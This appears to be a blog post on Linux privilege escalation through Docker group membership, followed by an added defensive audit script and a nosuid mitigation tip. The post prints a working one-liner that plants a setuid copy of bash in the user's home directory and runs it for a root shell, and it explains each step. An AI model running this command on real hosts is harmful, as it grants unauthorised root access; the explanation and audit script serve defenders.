One-Liner Linux Privilege Escalation with Docker 1.12.6

I just came up with this on my own, got excited, then saw that this technique has
been around for a couple years already, but what the hell? I already wrote the post,
so here you go:

A common step during the docker installation process is to add a user to the “docker”
group so that they can run containers without sudo-ing. People have warned that this
is dangerous. They are correct.

If an attacker pops your box and is on a low priv account BUT that account can run
docker containers, the attacker can perform a privilege escalation attack on Linux
using docker trivially. Like so:

```bash
$ docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p
```

Screenshot of Linux Privilege Escalation with Docker

GAME OVER

What’s going on here?

When you run a docker container, things run as root INSIDE that container.
So the line:

```bash
cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;
```

is run as root inside the container. So you get a copy of a suid-enabled bash
saved into /h_docs INSIDE the container.

/h_docs is of course mapped to a directory on your host file system, so you could
find it using ```docker inspect``` but to make things easy, we map the volume to
our low-priv user's home directory.

That's where this part of the ```docker run``` command comes from:

```bash
-v /home/${USER}:/h_docs
```

After the container finished running the command you will find a lovely new
suid-enabled, executable file in the home directory called rootshell.

Screenshot of ls -a ~/rootshell

Then bypass bash's normal suid protection (it drops the elevated effective UID at
startup unless told otherwise) by running with the -p flag and you are golden.

Once again:

Screenshot of Linux Privilege Escalation with Docker
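
From the defender's side, two things are worth checking on a host: who is in the docker group, and whether a setuid binary has appeared under a home directory. The script below is an added example, not part of the original post; the function names are made up for illustration, and it assumes accounts live in local group and passwd files rather than LDAP/SSSD.

```bash
# Added audit example (not from the original post). Reads local files only;
# accounts served by LDAP/SSSD are not covered.

# Users in the docker group: supplementary members (field 4 of the group
# file) plus anyone whose primary GID in the passwd file is the group's GID.
# $1 = group file, $2 = passwd file, $3 = group name
docker_group_users() (
    group_file=${1:-/etc/group}; passwd_file=${2:-/etc/passwd}; name=${3:-docker}
    gid=$(awk -F: -v g="$name" '$1 == g { print $3; exit }' "$group_file")
    {
        awk -F: -v g="$name" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        if [ -n "$gid" ]; then
            awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
        fi
    } | sort -u
)

# Regular files with the setuid bit under a directory tree, such as the
# rootshell copy the one-liner leaves in the user's home directory.
# $1 = directory to scan
setuid_files() (
    find "${1:-/home}" -xdev -type f -perm -4000 2>/dev/null | sort
)

# Print both findings; exit status 1 means something needs review.
# $1 = group file, $2 = passwd file, $3 = directory to scan
audit() (
    users=$(docker_group_users "$1" "$2")
    suid=$(setuid_files "$3")
    [ -z "$users" ] || printf '%s\n' "$users" | sed 's/^/docker group (root-equivalent): /'
    [ -z "$suid" ] || printf '%s\n' "$suid" | sed 's/^/setuid file: /'
    [ -z "$users" ] && [ -z "$suid" ]
)

# Usage: audit /etc/group /etc/passwd /home
```

Mounting the filesystem that holds home directories with `nosuid` makes the kernel ignore the setuid bit on a file like rootshell, but membership in the docker group remains root-equivalent either way.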
